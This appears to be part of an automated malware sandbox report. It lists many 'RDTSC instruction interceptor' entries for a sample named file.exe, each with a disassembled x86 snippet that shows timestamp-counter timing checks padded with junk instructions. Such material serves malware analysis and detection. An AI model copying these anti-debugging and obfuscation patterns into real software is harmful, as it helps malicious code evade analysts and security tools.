Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56D18 second address: D56D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56D1C second address: D56D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56D20 second address: D56D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0D344F4AB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov ebx, dword ptr [ebp+122D2A0Ch] 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov dword ptr [ebp+122D27C9h], edi 0x0000003c mov eax, dword ptr [ebp+122D0009h] 0x00000042 clc 0x00000043 stc 0x00000044 push FFFFFFFFh 0x00000046 mov ebx, 53A96C00h 0x0000004b nop 0x0000004c jl 00007F0D344F4AC6h 0x00000052 jns 00007F0D344F4AC0h 0x00000058 push eax 0x00000059 push edi 0x0000005a pushad 0x0000005b jmp 00007F0D344F4ABBh 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C40 second address: D57C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C46 second address: D57C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C4A second address: D57C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B05 second address: D59B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B09 second address: D59B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B0D second address: D59B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B13 second address: D59B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B19 second address: D59B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5AC52 second address: D5ACAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F0D34B70907h 0x0000000f popad 0x00000010 nop 0x00000011 push ebx 0x00000012 xor ebx, dword ptr [ebp+122D3941h] 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c js 00007F0D34B708F7h 0x00000022 cmc 0x00000023 popad 0x00000024 push 00000000h 0x00000026 movsx edi, cx 0x00000029 mov dword ptr [ebp+122D25EFh], ebx 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5ACAA second address: D5ACB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5BBAF second address: D5BC10 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F0D34B708F8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F0D34B708F8h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov di, si 0x00000044 push 00000000h 0x00000046 sub dword ptr [ebp+122D30B7h], eax 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jnl 00007F0D34B708F6h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5BC10 second address: D5BC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5BC15 second address: D5BC35 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F0D34B708FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0D34B708F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CC63 second address: D5CCCD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D344F4AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F0D344F4ABEh 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D19ECh], ecx 0x00000018 and edi, 03D18329h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F0D344F4AB8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a cld 0x0000003b push 00000000h 0x0000003d mov bx, si 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0D344F4AC1h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CCCD second address: D5CCD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59E10 second address: D59E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59E16 second address: D59E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5DE83 second address: D5DE8D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CE61 second address: D5CE6B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D34B708FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5EDE1 second address: D5EDE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5EFB0 second address: D5EFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D60037 second address: D6003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6003B second address: D60041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68091 second address: D680CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F0D344F4AC7h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D344F4AC9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D680CB second address: D680CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D678BC second address: D678C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67BE4 second address: D67BF2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67BF2 second address: D67BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67BF7 second address: D67C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67C07 second address: D67C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4AC5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0D344F4AC5h 0x00000012 jmp 00007F0D344F4ABFh 0x00000017 jmp 00007F0D344F4AC2h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67C5E second address: D67C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6AF02 second address: D6AF08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07F58 second address: D07F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6EDB7 second address: D6EDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6EDBF second address: D6EDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7083A second address: D70847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D70847 second address: D7084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7084B second address: D70851 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D70851 second address: D7087C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0D34B70907h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jl 00007F0D34B70900h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7087C second address: D708A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007F0D344F4AC3h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D708A2 second address: D708A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76AAA second address: D76AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75726 second address: D75740 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D34B70904h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75F9D second address: D75FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F0D344F4ABBh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jc 00007F0D344F4AB6h 0x0000001a je 00007F0D344F4AB6h 0x00000020 jmp 00007F0D344F4ABFh 0x00000025 popad 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push edi 0x0000002a pop edi 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75FDD second address: D75FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75FE4 second address: D75FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75FEA second address: D75FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D762D8 second address: D762F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0D344F4AC9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D762F6 second address: D76312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D34B70908h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76640 second address: D7664E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7664E second address: D76671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007F0D34B70904h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F0D34B708F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFF959 second address: CFF95E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFF95E second address: CFF968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFF968 second address: CFF97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFF97A second address: CFF97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B29F second address: D7B2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0D344F4ABEh 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B2B7 second address: D7B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B56C second address: D7B599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0D344F4AC3h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F0D344F4AC1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BA23 second address: D7BA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0D34B70906h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BA41 second address: D7BA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C334 second address: D7C338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82194 second address: D821BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F0D344F4AC7h 0x00000010 js 00007F0D344F4ABCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D821BD second address: D821CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F0D34B708F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81243 second address: D81249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81249 second address: D81275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0D34B708FEh 0x0000000c jc 00007F0D34B70918h 0x00000012 jmp 00007F0D34B708FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D813CB second address: D813E2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D344F4ABAh 0x00000008 pushad 0x00000009 js 00007F0D344F4AB6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8186A second address: D8186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8186E second address: D81872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81872 second address: D81880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 je 00007F0D34B708F6h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819AD second address: D819B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819B1 second address: D819B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819B5 second address: D819BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819BB second address: D819C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819C1 second address: D81A0D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D344F4AC8h 0x00000008 push edi 0x00000009 jmp 00007F0D344F4ABCh 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0D344F4AF8h 0x00000017 pushad 0x00000018 jmp 00007F0D344F4AC2h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81A0D second address: D81A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81A11 second address: D81A2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2EEE3 second address: D2EEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81FF1 second address: D82005 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F0D344F4ABAh 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82005 second address: D82016 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D34B708FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82016 second address: D8201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8201C second address: D82022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8093F second address: D80964 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D344F4AC5h 0x0000000f jnl 00007F0D344F4AB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46285 second address: D2E36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d ja 00007F0D34B708F6h 0x00000013 jmp 00007F0D34B70903h 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b mov edx, dword ptr [ebp+122D197Ch] 0x00000021 call dword ptr [ebp+122D30CFh] 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007F0D34B70901h 0x0000002e jmp 00007F0D34B70903h 0x00000033 jmp 00007F0D34B708FCh 0x00000038 popad 0x00000039 pushad 0x0000003a jmp 00007F0D34B70903h 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46761 second address: D46767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46767 second address: D46771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0D34B708F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46A2D second address: D46A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46A34 second address: D46A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46A41 second address: D46A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46B7C second address: D46B86 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
